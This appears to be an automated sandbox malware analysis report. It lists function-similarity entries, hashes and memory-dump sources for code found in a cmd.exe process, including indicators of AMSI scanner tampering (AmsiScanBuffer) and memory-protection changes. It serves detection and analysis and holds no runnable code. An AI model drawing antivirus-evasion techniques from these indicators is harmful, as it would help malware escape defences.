                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: 1c8ac6b188bebe2a6c7345b89ed758822f8cce582729b28e9e88213f5e3ebcdf
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 09113321300E40C3FA56E731EC5D36EA251EB9F792F984625E86A5B3CEDE38D549430C
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: a60ea011f1958ee17843ec50aa47e9ddf3601cbd722d2dac20d5af48567f3735
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 03119421300E90C2F718EB316C1D36ED651DB8F7A6F984225ED76567CACE3ED409430A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 81c6b14d5856d3cc49bf4e7d151ac78b8e5e4677dbfebfe14fdf2a9eed0d8ee2
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: 8C015B21700E40C3EA51DB22E858759A3A1F79EFC1F484035DE5D437D8DE38C689C754
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 8062ea3777361aaf769fd104c42247a1a4f26637bc06a07f7c42cb638b46b80b
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: EC015B21700E41C2EA10DB12AC5835AA3A1F78DFD1F484034DE6D437D4DE3CC98AC799
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: 48e0aec2aa3bb7b15e76ab03b726558a19bfd44b6c478f71e48c1180bed0edc5
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 31010565211F40C3FB66DB21EC4CB5AB2A0EB5EB46F044028DA49463E8EF3DC54C8708
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: 5585ebcf1926b34883c6413f8be55c63534ce7dc8660c0889ec95876b78b88b0
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: E3011B65211F41C2EB24DB65EC5C75AB2A0FB4EB96F080024C96D063E8EF3DC04C879A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: c87db0438632d337b303537608cb96311ab4096f315008d5b1aad79e1934dc2a
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: F4F08122314A84D3E761CB24EC88359A361F75AB89F8440218A49425D8DE7CC68CC704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: f0aaf5f9d33c9d8fff0f1652342d7f9264a67386072e24dca2f24acb3a4ccc09
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 79F0A422314E85D2EB20CB20FC8835EE361F749B99F844021CA5D426D4DF7CC68CC745
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: 4497025c4f0a6c9ad431fddf92db267582bdc678b5450b6dfde4822052412f61
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 3EF09061201E01C3FA52CB24EC8C369A730EB8F762F940319DAAA451E8CF3DC54CC718
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: 19b08da54325c72230b2d9a3aa8fd6b7180f303ad0e659c685d072801e4794a2
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: 62F05E64704F90C3EA86CB27FD1811AE661EB5EFC2F448530EE4A07BD8CE38C5498708
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: e0523ff5bc4941b66f970e5064559f72f0c9af6bc8d7455e09f607f55843a1d3
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 03F09061205E01C1EB10CB24EC8936EA760EB8F766F980219DA7A492E4CF3DC44DC78A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: 0c4e79e96454463c58509058a755d5a15a63a79a330d9fae1a055ea0b5b5401a
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: B2F05464304F80C1EA04DB13BD1822AD251F74DFC2F449530ED2647BD8CE38D9898745
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 6483bcadd7cf88fd87a48a9eba789e3e948919b7902e669d6caea1f9c789e4b2
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: DAD01720A11E01D2EA08EF40EC5C32AA221FBAEB13FC40014C52A063E4DE3CA44CC3DA
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: a3db27a47fb6dc8ecf69f04cbaba1fd769aea916a185dfaef03210489fe46a24
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: 2102B632219B84C6E7A1CB65F89435AF7A0F389795F104015EA8E87BE8DF7DC498CB05
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: 40c7e14608a2328e88efd3acb7c623058729cd745a1b7728dab72c13ffd544eb
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: 0902B932219B84C6EB60CB59E89435AF7B0F3C9795F104016EA9E87BE8DB7DC458CB05
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: dcc0f65b68ce192acf713f7f58e26ba1a7eac96b78e0ad3617807e20a2eda88c
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 94519F35204E11C7E366CF26EC48A5AF3A4F79EB86F508119DE5A43BD4DB38C949CB08
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: 36a1359e6faada86d549f7ebef3994888d40cf4af4caad94dd4f07c23df321df
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: F851B135204E01CBE764CB5AEC49A5AF3A0F78EB92F504119DE6A437D4DF3AC809CB49
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 7c1200e4def28276fe0bf26720e4af28c0dd19343a35ef5e2783541f964835bd
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 9C518C36214E41CBE765CF26EC48A6AF3A0F39EB86F504119DE5A437D4DB38D909CB08
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 0eecac4d0ac25ba7febab66d9ab9f8bc51e091879ec3ea68a7ed319700d884f2
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 30518E35214E41CBE724CF5AAC4966AF3A0F38EB96F404119DE6A437D4DB39D909CB09
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: 87640be07fcec805adc248af6962543f391f4352796f1d53016038fc01c2d628
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: 2F61B476129A40C7F761DB25E85831AF7A0F38E745F50051AEA8D83BE8DB7CC548CB09
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
